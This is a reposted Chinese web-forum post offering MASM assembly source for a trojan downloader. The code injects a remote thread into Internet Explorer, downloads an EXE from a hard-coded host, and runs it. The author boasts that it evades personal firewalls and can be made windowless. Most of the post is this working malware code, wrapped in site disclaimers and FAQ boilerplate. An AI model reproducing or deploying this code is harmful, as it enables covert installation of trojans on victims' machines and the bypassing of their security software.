也想出现在这里? 联系我们

教你注入下载文件的代码到IE进程然后下载的文件

作者 : 小编 本文共2162个字,预计阅读时间需要6分钟 发布时间: 2021-06-1 共2.21K人阅读
也想出现在这里? 联系我们

大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候

后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)

所以写了这个程序。。。。

程序还要改下才好用哈,不过只有2kb很小了。。。。

编绎参数:

C:\\masm32\\BIN>type ii.bat

ml /c /coff i.asm

link /subsystem:windows i.obj

刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。

; #————————————–# #

; # Injection downloadcode in IE –> # #

; # –>also it can jump personal fire wall # #

; # 2004.07.15 #

; # codz: czy # #

; #——————————————# #

;test on win2k server sp4 masm8

.386

.model flat,stdcall

option casemap:none

include ../include/user32.inc

includelib ../lib/user32.lib

include ../include/kernel32.inc

includelib ../lib/kernel32.lib

include ../include/windows.inc

.data

hello db ’2K下建远程线程’,0

tit db ’IEFrame’,0

szFormat db ’PID是:%d’,0

szBuffer dd 20 dup(0),0

pid dd 0

hProcess dd 0

hThread dd 0

pCodeRemote dd 0

path1 db ’c:\\a.EXE’,0

.const

szmsg db ’URLDownloadToFileA’,0

userdll db ’Urlmon.dll’,0

;szmsg db ’MessageBoxA’,0

;userdll db ’User32.dll’,0

szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟

kerdll db ’kernel32.dll’,0

.code

codebegin:

dispdata db "http://192.168.0.5/NBTreeList.exe",0

szTit db "c:\\a.exe",0

datalen =$-codebegin

Rproc proc msgbox ;MessageBoxA的地址为参数

CALL @F ;push esi

@@:

POP EBX

SUB EBX,OFFSET @B

LEA ECX,[EBX dispdata]

LEA EDX,[EBX szTit]

push NULL

push 0

push edx

push ecx

push NULL

call msgbox

ret ;重要

Rproc endp

codelen =$-codebegin ;代码长度xx字节

start:

;invoke FindWindow,0,offset tit ;返回计算器窗口句柄

invoke FindWindow,offset tit,0

invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号

;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示

invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄

mov hProcess,eax ;保存进程句柄

invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE

mov pCodeRemote,eax

invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL

mov esi,pCodeRemote

add esi,datalen

push esi

invoke LoadLibrary,offset userdll

invoke GetProcAddress,eax,offset szmsg

pop esi

invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0

mov hThread,eax ; 返回线程句柄

.if hThread

invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束

invoke CloseHandle,hThread ;关闭线程句柄

.endif

invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间

invoke CloseHandle,hProcess ;关闭进程句柄

invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。

;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1

invoke ExitProcess,0

end start

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 教你注入下载文件的代码到IE进程然后下载的文件

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录